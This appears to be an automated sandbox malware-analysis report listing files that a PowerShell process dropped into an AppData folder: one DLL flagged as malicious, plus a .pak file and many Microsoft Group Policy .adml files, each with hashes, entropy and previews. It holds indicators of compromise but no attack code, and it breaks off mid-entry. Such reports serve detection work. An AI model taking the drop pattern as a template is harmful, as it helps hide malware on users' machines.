Preview:	<?xml version="1.0" encoding="utf-8"?>..<configuration>.... <appSettings>.. <add key="DownloadLocation" value=""/>.. </appSettings>.... <runtime>.... <assemblyBinding xmlns="urn:schemas-microsoft-com:asm.v1">.... <dependentAssembly>.... <assemblyIdentity name="System.Runtime" publicKeyToken="b03f5f7f11d50a3a" culture="neutral"/>.... <bindingRedirect oldVersion="0.0.0.0-4.0.0.0" newVersion="4.0.0.0"/>.... </dependentAssembly>.... <dependentAssembly>.... <assemblyIdentity name="System.Threading.Tasks" publicKeyToken="b03f5f7f11d50a3a" culture="neutral"/>.... <bindingRedirect oldVersion="0.0.0.0-4.0.0.0" newVersion="4.0.0.0"/>.... </dependentAssembly>.... <dependentAssembly>.... <assemblyIdentity name="System.Net.Http" publicKeyToken="b03f5f7f11d50a3a" culture="neutral"/>.... <bindingRedirect oldVersion="0.0.0.0-4.0.0.0" newVersion="4.0.0.0"/>.... </dependentAssembly>.... </assemblyBinding>.... </runtime>

C:\Users\user\AppData\Roaming\VWPGdipf\Data\d3dcompiler_47.dll

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	4917656
Entropy (8bit):	6.3987875878837785
Encrypted:	false
SSDEEP:	49152:+CZnRO4XyM53Rkq4ypQqdoRpmruVNYvkaRwvdiD0N+YEzI4og/RfzHLeHTRhFRNZ:tG2QCwmHjnog/pzHAo/Ay
MD5:	B37CC24FCFDCCA9DEAD17A498E66DB9C
SHA1:	C959AB27CE476DCB0C7312C30C613FE3307BB877
SHA-256:	9F5B1AD41183BA50896EB09BE917B1382980224E212A97080D33C0BF3DEE40DD
SHA-512:	E62E1B985939688AA2EB920F5CFA50377934A8256D7AAA8A1DEF705DE1D47E5CD15515D043622553BBE512469F5C2ED05A7BDEDD4F5D17E99109274F9BFFE95C
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........\|3..]...]...]..e\...]...\.5.]..e...]..wX...]..wY...]..e^...]..eX.y.]..eY...]..e]...]..eU./.]..e....]..e_...].Rich..].................PE..d.....Ne.........." ......8..........<).......................................K.......K...`A........................................`%G.x....(G.P.....J.@.....H.......J..)....J.....p.D.p....................S<.(...pR<.@............S<.(............................text.....8.......8................. ..`.rdata...F....8..P....8.............@..@.data...`....@G......@G.............@....pdata........H......@H.............@..@.rsrc...@.....J......@J.............@..@.reloc........J......PJ.............@..B........................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\VWPGdipf\Data\devtools_resources.pak

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	6175880
Entropy (8bit):	5.4706772583563845
Encrypted:	false
SSDEEP:	49152:sLFPZAKkA/koZdvvVqdkTZdvvVqwkF/yWzmJUTvU8ZaTG2os1y3JkkaXSqDJMuXR:WLwW
MD5:	731A70D555B49A74607EFA43D407948F
SHA1:	01B9D0CF34EAB6D171A819C0A6A694B8B499702E
SHA-256:	94B15729530FCF90D11156D38FFD0152ACE21182EE44E63C51DC5E2AF25345D2
SHA-512:	4D8EB837BA3FF475F42D72DF0375CA4CC0CA18B4E3702FF39E910D67686AFB81234C457C61BDD36C8927FF73695BB19017423CDA2787242273E0BAA398DDABB0
Malicious:	false
Preview:	........~....p.....p.....p.3...p.6...p.p...p./...p.3...p.7...pd....p8....pu....pM....p.....p:]$..pu_$..p.0%..p.2%..pQ.%..pR.&..p..+..psi+..pV.+..p..+..p.a0..p.A1..p;.3..p..3..p.?4..p..5..p..5..p..5..p..:..p4W:..p~w:..pD.:..py.:..p0.;..p+.;..pe.=..pe.=..p..>..p..>..p..B..pN.C..pi~E..p..E..p..H..q.PI..q3.L..q.OL..q..L..q,,M..qP?M..q%SN..q..R..qo.U..q.wV..q.xZ..q..Z..q<0[..q..\..q.n\..q.v\..q~w\..q.~\..q.~\..q..\..q..\..q..\..q.\..qy.\..q..\..q.\..qm.\..qs.\..q.\..qp.\..ql.\..q.\. ql.\.!q..\."q..\.#q..].$q=.].%q..].&q..].'q..].(q..].)q..].*qa"].+q.\].,q.n].-q.]..q.]./q..].0qB.].1q..].2q..].3q.].4q..].5q`.].6qL.].7q.].8qG.].9q..].:q..].;q+.].<q..].=q.].>q\.].?qo.].@q..].Aq..].Bq..].Cq..].Dq>.].Eq..].Fq\.].Gq..].HqB.^.Iq..^.Jq).^.Kq8.^.Lq>.^.Mq..^.Nq..^....<^..p&.W._,...T...Ve .8..P.H...=......D.g.{.:..r.....R.j.`.._....a.J...[U....[.o.A.......Uvx......lM........k...2\|.+.....c1BJu[G"..A.p.Z.......I..^x....Q4....2f.6..[..#x...T.}r....oP...(i......pr..mU_.O5.2..4{}.MQG..

C:\Users\user\AppData\Roaming\VWPGdipf\Data\en-US\ActiveXInstallService.adml

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	XML 1.0 document, ASCII text, with very long lines (403), with CRLF line terminators
Category:	dropped
Size (bytes):	5601
Entropy (8bit):	4.777090038504722
Encrypted:	false
SSDEEP:	48:cgeD5x8gm0fUsPXKn5o3OqALPLFS31U87GUkNAsGNuiYzXmoOX1mTXoWlIGe0FsC:LeD5pmKeC3G8SsuiYR1Pl7e0V4zZpBsV
MD5:	46876B1E6C8BA1FBF3ABC838CCF809B0
SHA1:	45CE70EDD0CA87A5920D43385066087DF134E30F
SHA-256:	F49428CABB6F6671D95EF214133100C268D2AB04DBF0F095DD08B0105ED9D8A7
SHA-512:	702C319B2D181753BE99D99C3DFF9F6C578934067C89A614E9E4B0A5DA6A0FB3545A3BA4986E12E9DA5DE8C6AF56780982D181A8D949A6E573AF725E2505DECA
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>ActiveX Installer Service</displayName>.. <description>Installs ActiveX controls from approved installation sites</description>.. <resources>.. <stringTable>.. <string id="AxInstSv">ActiveX Installer Service</string>.. <string id="AxISURLZonePolicies">Establish ActiveX installation policy for sites in Trusted zones</string> .. <string id="AxISURLZonePolicies_explain">This policy setting controls the installation of ActiveX controls for sites in Trusted zone. ....If you enable this policy setting, ActiveX controls are installed according to the settings defined by this policy setting. .. ..If you disable or do not configure t

C:\Users\user\AppData\Roaming\VWPGdipf\Data\en-US\AddRemovePrograms.adml

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	XML 1.0 document, ASCII text, with very long lines (496), with CRLF line terminators
Category:	dropped
Size (bytes):	10736
Entropy (8bit):	4.664813059485856
Encrypted:	false
SSDEEP:	192:Eyvs59wT2mCtKNSMRdMi4LBDZDHZEzT+ygx5LDkFdzj9nWyihWhqeGzpbeEKJ28m:ZvyiCDdyTO54zj9na8hqe6pbeEK5jq
MD5:	DFE20A0CA8674D6EAEA280C139E2688A
SHA1:	97027B92D40F5029FF296A9EA3105B775B50C209
SHA-256:	C97CD236F8BE2B235685D3D16632482839208604DB3F550F9524EAFDA33B9CA9
SHA-512:	120C45BD17045B6F3D4A9295E1888D81FFA99ED0F1D146AA2EEC387C1187EEF8C718179771BC0CDBE01A37A487D933F55C92F6F37954F392F007CBFAA2AEC877
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="Arp">Add or Remove Programs</string>.. <string id="DefaultCategory">Specify default category for Add New Programs</string>.. <string id="DefaultCategory_Help">Specifies the category of programs that appears when users open the "Add New Programs" page.....If you enable this setting, only the programs in the category you specify are displayed when the "Add New Programs" page opens. Users can use the Category box on the "Add New Programs" page to display programs in other categories.....To use this setting,

C:\Users\user\AppData\Roaming\VWPGdipf\Data\en-US\AppCompat.adml

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	XML 1.0 document, ASCII text, with very long lines (565), with CRLF line terminators
Category:	dropped
Size (bytes):	10119
Entropy (8bit):	4.722381803392372
Encrypted:	false
SSDEEP:	192:EsMVhCuGKXl6hIAtZUqxw66Utw0Uvk3EUN2X/TDcvEn:J/uX6GAjj6mcvk3EUN2XXcvQ
MD5:	93C28840D18ED15AF63308926F5AAC66
SHA1:	5ED7A8056F1E8A68FEA17C6EF81B695DF8A3EA70
SHA-256:	0AC43A8DF0E8795968C0F9B6ECC6FBF620B761C128545AD689EEC5DFF21F5F1D
SHA-512:	653B9905DC0BBDE62F06EFA1C613F4E4A0823331D31D396DB0226FDB41A9AD4D148C1B5DABFA0CA64A74156F5AD446428F3344FFE75828A7C8225D3F0D214758
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="AppCompat">Application Compatibility</string>.. <string id="AppCompat_Prevent16BitMach_Help">Specifies whether to prevent the MS-DOS subsystem (ntvdm.exe) from running on this computer. This setting affects the launching of 16-bit applications in the operating system.....You can use this setting to turn off the MS-DOS subsystem, which will reduce resource usage and prevent users from running 16-bit applications. To run any 16-bit application or any application with 16-bit components, ntvdm.exe must be allowed

C:\Users\user\AppData\Roaming\VWPGdipf\Data\en-US\AppXRuntime.adml

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	XML 1.0 document, ASCII text, with very long lines (394), with CRLF line terminators
Category:	dropped
Size (bytes):	4462
Entropy (8bit):	4.744620806615911
Encrypted:	false
SSDEEP:	96:jJpm5IJUVaBfgHt6kNEmB+kClbNpbj03V:Xc3AIHF20F
MD5:	BF19DB2E91EDEFE517515BA23B30103E
SHA1:	324D98B315D7F8E096D8D61505610706D0C73856
SHA-256:	42778994D23CDB74C446E70C30942991E89DF6AACC1225AEBB05464D69DA6DEC
SHA-512:	9C193CD9597F90913643CDD2079E36930E60B6AB539D96BA0D5DA7EA2B5DDE0B78D7451D0A4AC37CBBB8A90C548285FBF640099EDA949665E186586D893ADB14
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>.. Copyright (C) Microsoft. All rights reserved. -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>App runtime</displayName>.. <description>App runtime policies</description>.. <resources>.. <stringTable>.. <string id="AppxRuntime">App runtime</string>.. <string id="AppxRuntime_Help">Contains settings to manage the behavior of Windows Store apps.</string>.. <string id="AppxRuntimeBlockFileElevation">Block launching desktop apps associated with a file.</string>.. <string id="AppxRuntimeBlockFileElevationExplanation">This policy setting lets you control whether Windows Store apps can open files using the default desktop app for a file type. Because desktop apps run at a higher integrity level than Windows Store apps

C:\Users\user\AppData\Roaming\VWPGdipf\Data\en-US\AppxPackageManager.adml

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	3093
Entropy (8bit):	4.7903363478779735
Encrypted:	false
SSDEEP:	48:c0Jx8gm9JcfSB2W27u0jX9X/f4kvqGbRG4QXzgtWFV:jJpm9Jc62Dv5bRjWFV
MD5:	B182F0B429A84D7E97C3D50EADF154A5
SHA1:	87DDA04EDCFE5E6C22F0224D9EE8375E0920B7F6
SHA-256:	5CD8B222AECBDEAC3DF2DE6B774AF7E02988981136F6E5E9CD3D12735C6A6416
SHA-512:	C42670FA053734C1B909FBB1AE189D4ACF72B290679C1564D78276022BDF0AFD279558C608F00953325E5AEE47EB93DF35C5AFDBB29F698E5C8F808610DB5055
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>.. Copyright (C) Microsoft. All rights reserved. -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. displayName and description are not used. Not supported by current Group Policy tools. -->.. <displayName>Appx Package Manager</displayName> .. <description>Appx Package Manager</description>.. <resources>.. <stringTable>.. <string id="AppxDeployment">App Package Deployment</string>.. <string id="AppxDeploymentAllowAllTrustedApps">Allow all trusted apps to install</string>.. <string id="AppxDeploymentAllowAllTrustedAppsExplanation">This policy setting allows you to manage the installation of trusted line-of-business (LOB) Windows Store apps.....If you enable this policy setting, you can install any LOB Windows Store app (which m

C:\Users\user\AppData\Roaming\VWPGdipf\Data\en-US\AttachmentManager.adml

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	XML 1.0 document, ASCII text, with very long lines (564), with CRLF line terminators
Category:	dropped
Size (bytes):	9845
Entropy (8bit):	4.7103779388766025
Encrypted:	false
SSDEEP:	96:LeD5pmiPXXvXd0GkXgueX0dX0LhTW9jS+9FMDPaSPL9DVH60XZgn9ZE60Y2IHm0s:EZHvmQ/WXtyPHPLuV3HmEPdHK
MD5:	156ADEBCA5CD43E0D849F921B26594C3
SHA1:	0DCDA3A3C5CDB824D7FAE9FD2D52638DE6BAC841
SHA-256:	6974AEBDCB65AB63DECD224D3C060F0AFCA11E00C781657EAD44F64073094BF8
SHA-512:	32DC4890719AAEBC7CB5A088EF7C4FD7A86207C36E76C0FA60584E3DF0687C2DF297CBF82750885BCD42542700BD0D14011D57D9CED9FC32E582F70061C68013
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="AM_AM">Attachment Manager</string>.. <string id="AM_CallIOfficeAntiVirus">Notify antivirus programs when opening attachments</string>.. <string id="AM_EstimateFileHandlerRisk">Trust logic for file attachments</string>.. <string id="AM_ExplainCallIOfficeAntiVirus">This policy setting allows you to manage the behavior for notifying registered antivirus programs. If multiple programs are registered, they will all be notified. If the registered antivirus program already performs on-access checks or scans

C:\Users\user\AppData\Roaming\VWPGdipf\Data\en-US\AuditSettings.adml

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	XML 1.0 document, ASCII text, with very long lines (369), with CRLF line terminators
Category:	dropped
Size (bytes):	1846
Entropy (8bit):	4.78689414618934
Encrypted:	false
SSDEEP:	48:cgeD5x8gmsYLytG4rpdfUMo5mvS3bHpWdPV:LeD5pmvWvp+5wwWNV
MD5:	71075FCE08402095AEAFBE57962A1F5B
SHA1:	F76FAE255AA5454217FE973C4A8035EC9005B923
SHA-256:	6928FAAD9624BBF4C74F6C138496A4C6AE8D04919C3DE9591568300C1DD39E59
SHA-512:	9DF7480E584B16D1B504E2503B3C4C8422EFC2FA37D9A4ACEB8A7AEA0561C0D73E8E73CB21FEA20C6EC3BBBCB715C155EFDA7B8E38B7B448BCDA5DB10D773DE4
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>Audit Process Creation</displayName>.. <description>Configuration settings for auditing process creation.</description>.. <resources>.. <stringTable>.. <string id="AuditSettings">Audit Process Creation</string>.. <string id="IncludeCmdLine">Include command line in process creation events</string>.. <string id="IncludeCmdLine_explain">This policy setting determines what information is logged in security audit events when a new process has been created.....This setting only applies when the Audit Process Creation policy is enabled. If you enable this policy setting the command line information for every process will be logged in plain tex

C:\Users\user\AppData\Roaming\VWPGdipf\Data\en-US\AutoPlay.adml

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4884
Entropy (8bit):	4.732776627339853
Encrypted:	false
SSDEEP:	96:LeD5pmCRsKp7RqiPKhB3a1jejcM64iVDJaqV:ELRRp74a1AbodJ7
MD5:	935C602DAD3F4335BD16C269E66DBFAA
SHA1:	3DF4DC6D55AF20F0593D807FB4FDEFB23CC3355A
SHA-256:	8773998440C8D534FA69833174D05D09088F07E6E5C0E41D7C04A229C7903879
SHA-512:	05ABFFC0CE836F7438BC711A9D2B5CEB8F3F1C48BE2AC9C1A91D286AED6FC4C8D740AE802DCD2CC65D066972DC8DAA84AD8A10FA775D66CB5F3DE34688D975EC
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="AutoPlay">AutoPlay Policies</string>.. <string id="AutoPlay_Help">Configure various AutoPlay behaviors.</string>.. <string id="NoAutorun">Set the default behavior for AutoRun</string>.. <string id="NoAutorun_Help">This policy setting sets the default behavior for Autorun commands..... Autorun commands are generally stored in autorun.inf files. They often launch the installation program or other routines..... Prior to Windows Vista, when media containing an autorun command is inserte

C:\Users\user\AppData\Roaming\VWPGdipf\Data\en-US\Biometrics.adml

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	XML 1.0 document, ASCII text, with very long lines (381), with CRLF line terminators
Category:	dropped
Size (bytes):	4309
Entropy (8bit):	4.706598922443907
Encrypted:	false
SSDEEP:	96:oD5pmJFp5A8M9DIn0C3ppMdiD+BukevPCRTqCV:+Mp5lM9M3ppUiC2vPClP
MD5:	C32F834C78DC4DB3C12084AB5115E4A5
SHA1:	BE211306E8BA801EDD43E68E28F98947354A35BC
SHA-256:	4222D7C39B72F570C01F76EE084278BD32619D039F197A1AAE0B508C4E2CAF32
SHA-512:	2551575C490A8B4C36FD0E44B4E7C27693DF94C74715BC0F242BE2F947AE2AF097D574AC1823F3ACC71E8D69C17D6257192AAB1255B25C3122F4196C10B9F674
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>.. (c) 2008 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>Biometrics Configuration Settings</displayName>.. <description>Biometrics Configuration Settings</description>.. <resources>.. <stringTable>.. <string id="BiometricsConfiguration">Biometrics</string>.. <string id="Biometrics_EnableBio">Allow the use of biometrics</string>.. <string id="Biometrics_EnableBio_Help">This policy setting allows or prevents the Windows Biometric Service to run on this computer... ..If you enable or do not configure this policy setting, the Windows Biometric Service is available, and users can run applications that use biometrics on Windows. If you want to enable the ability to log on with biometrics, yo

C:\Users\user\AppData\Roaming\VWPGdipf\Data\en-US\Bits.adml

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	XML 1.0 document, ASCII text, with very long lines (534), with CRLF line terminators
Category:	dropped
Size (bytes):	32159
Entropy (8bit):	4.887654356231583
Encrypted:	false
SSDEEP:	768:Uw9+2pWqx80t3lMsQAZ5nV7smu7CQ62TDw4p2L:H+2Lx8Q3lLB+wx
MD5:	F6E746CD330A73B928C14770D9645BD0
SHA1:	7EDED72EB36035A93AF3943B6F5F330082307968
SHA-256:	80D730B14BBB66B29360C108C8A57E09AA33E57DC1C9EAFFCAD5D66B3EF98C31
SHA-512:	6295E9062941DAEDCF4BF3E5BEBA03010AFDE880F43E95052DBCE3FDB485C92C73B0CB57E9374F691C79FA43044CFCBBDB92CDE189E1C3AFF90024B19B525F1E
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.2" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. Supported Platforms -->.. <string id="SUPPORTED_WindowsXPSP2WindowsNETSP1orBITS20">Windows XP SP2 or Windows Server 2003 SP1, or computers with BITS 2.0 installed.</string>.. <string id="SUPPORTED_WindowsXPWindowsNETorBITS15">Windows XP or Windows Server 2003, or computers with BITS 1.5 installed.</string>.. <string id="SUPPORTED_Windows7OrBITS35">Windows 7 or computers with BITS 3.5 installed.</string>.. <string id="SUPPORTED_Windows8OrBITS5">Windows 8 or Windows Server 2012 or Windows RT or computers

C:\Users\user\AppData\Roaming\VWPGdipf\Data\en-US\CEIPEnable.adml

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1949
Entropy (8bit):	4.91759301234844
Encrypted:	false
SSDEEP:	24:2dgeD5eo8gWt4+3Fbef61yMPs9IsKiz+d9Wz+fWz+MJe4UNr2ce4u5qHLuB1XR0r:cgeD5x8gm8fKfiI9W+WwUzqG1XGPV
MD5:	CB1E5DCF00DD4AA26834F7F02EA4AA0E
SHA1:	EAEBB6A75FE6AEEC3AFE914DF9DAD9BCB08702C1
SHA-256:	7651F59A99180721F39B02391BB51D382B39DBCD15E3E2245B10778B7A8A5D95
SHA-512:	BC84BD30E99735495803360F061088334736CAF9D7AE1C5FAD9C484D949991F09C59D6FB818DE35F6328E94FEDD63C2C6D80D63ACDF616BF936762CBF656AE3A
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="WindowsCEIPCat">Windows Customer Experience Improvement Program</string>.. <string id="CorporateSQM">Allow Corporate redirection of Customer Experience Improvement uploads</string>.. <string id="CorporateSQMExp">If you enable this setting all Customer Experience Improvement Program uploads are redirected to Microsoft Operations Manager server.....If you disable this setting uploads are not redirected to a Microsoft Operations Manager server.....If you do not configure this setting uploads are not redirect

C:\Users\user\AppData\Roaming\VWPGdipf\Data\en-US\COM.adml

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1670
Entropy (8bit):	4.895822032017801
Encrypted:	false
SSDEEP:	24:2dgeD5eo8gWt4+3Fbef61yr7g9f8rbcFCv/9g4+4R4ldQ8o9+YPb+aDDWFV:cgeD5x8gm8fKN2fcFC2u47QxQ3aDDWFV
MD5:	33757EAC0441251ACE18BD74FF8E2BD0
SHA1:	B9DBC0B240CF803AFACB5D8D9AD26E39B757B04B
SHA-256:	44FA3B1E818EF70305AD41012D78CF140851EC0949D4F2457F60C295E31C8EDC
SHA-512:	5FB7BD40C37EAB269C7E9CF72EFB29D6A6A2EF76DB29DADD628866143A15FCEE46C865BE54C66D7C6ADE13766FF1A3028912BDF8BE05F1A6CD69D254431180C2
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="AppMgmt_COM_SearchForCLSID">Download missing COM components</string>.. <string id="AppMgmt_COM_SearchForCLSID_Help">This policy setting directs the system to search Active Directory for missing Component Object Model (COM) components that a program requires.....Many Windows programs, such as the MMC snap-ins, use the interfaces provided by the COM components. These programs cannot perform all their functions unless Windows has internally registered the required components.....If you enable this policy setting

C:\Users\user\AppData\Roaming\VWPGdipf\Data\en-US\CipherSuiteOrder.adml

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	XML 1.0 document, ASCII text, with very long lines (1488), with CRLF line terminators
Category:	dropped
Size (bytes):	6011
Entropy (8bit):	5.030765177000099
Encrypted:	false
SSDEEP:	96:LeD5pmTKr0l1CSYNTV5vDiUFO3q6fWbKldN6joV:EqMRbaW+HN6c
MD5:	F7E00A4ABE6853A853D65FB722604674
SHA1:	9CFD9B20C60FB7024F91A7902D84182081427D7F
SHA-256:	4E01B6A54C1B3933D33645729AF7F69E50D687C37DB985A924917E6F8ACAB15B
SHA-512:	2ADAC9CDA13B12F0C2B2F7E9C9B943B50BE9A217FB32B486F783A5D842A820F2F2928E5336DE6E4FCA4B5CD9FC4F2D7FAA09F6C8285550CA7B3BD19E0CE4CA8B
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="SSLConfiguration">SSL Configuration Settings</string>.. <string id="SSLCipherSuiteOrder">SSL Cipher Suite Order</string>.. <string id="SSLCipherSuiteOrder_Help">This policy setting determines the cipher suites used by the Secure Socket Layer (SSL)..... If you enable this policy setting, SSL cipher suites are prioritized in the order specified..... If you disable or do not configure this policy setting, the factory default cipher suite order is used..... SSL2, SSL3, TLS 1.0 and T

C:\Users\user\AppData\Roaming\VWPGdipf\Data\en-US\Conf.adml

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	10980
Entropy (8bit):	4.778547657476326
Encrypted:	false
SSDEEP:	96:LeD5pmrrC2ZHEU5p5a4LH/+3SenetLKZHtpeL3DKTGbpKPKryy6JI5oyvr5UV:ESrC2RlFagcSenetKZHtOzrKPKrB5xj+
MD5:	797657FCFBC025F92F896B0095D1F6E4
SHA1:	F357F8B9A9671F711EAE5BEB7759A2EF73B953E9
SHA-256:	032F6BB5FBA082CA24EA70F6CBDC25E913FD43B68A44582AB30AEB29509FC2ED
SHA-512:	9C90FEE9737A7F66CD50B43C30A2BA05DC861A76618612DC744F7075D3296DDE577589060D3CC5779E44CA14ADD42502420DCDF9A68825817795FC89418847DD
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="AllowPersistAutoAcceptCalls">Allow persisting automatic acceptance of Calls</string>.. <string id="AllowPersistAutoAcceptCalls_Help">Make the automatic acceptance of incoming calls persistent.</string>.. <string id="AppSharing">Application Sharing</string>.. <string id="AudioVideo">Audio & Video</string>.. <string id="DisableAdvCallingButton">Disable the Advanced Calling button</string>.. <string id="DisableAdvCallingButton_Help">Disables the Advanced Calling button on the General Optio

C:\Users\user\AppData\Roaming\VWPGdipf\Data\en-US\ControlPanel.adml

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	XML 1.0 document, ASCII text, with very long lines (545), with CRLF line terminators
Category:	dropped
Size (bytes):	6210
Entropy (8bit):	4.659729688008146
Encrypted:	false
SSDEEP:	96:LeD5pm0xrbTb9qSrboXpqjKq+F6TzGQ5wtt1cvWebgbPWLSrbTpKb9LbpqjKm+xN:EXx19axpuN52t16W7WW7p4Xxt49tY
MD5:	02F20EFB8F224DE1BECE4FA4FADF1442
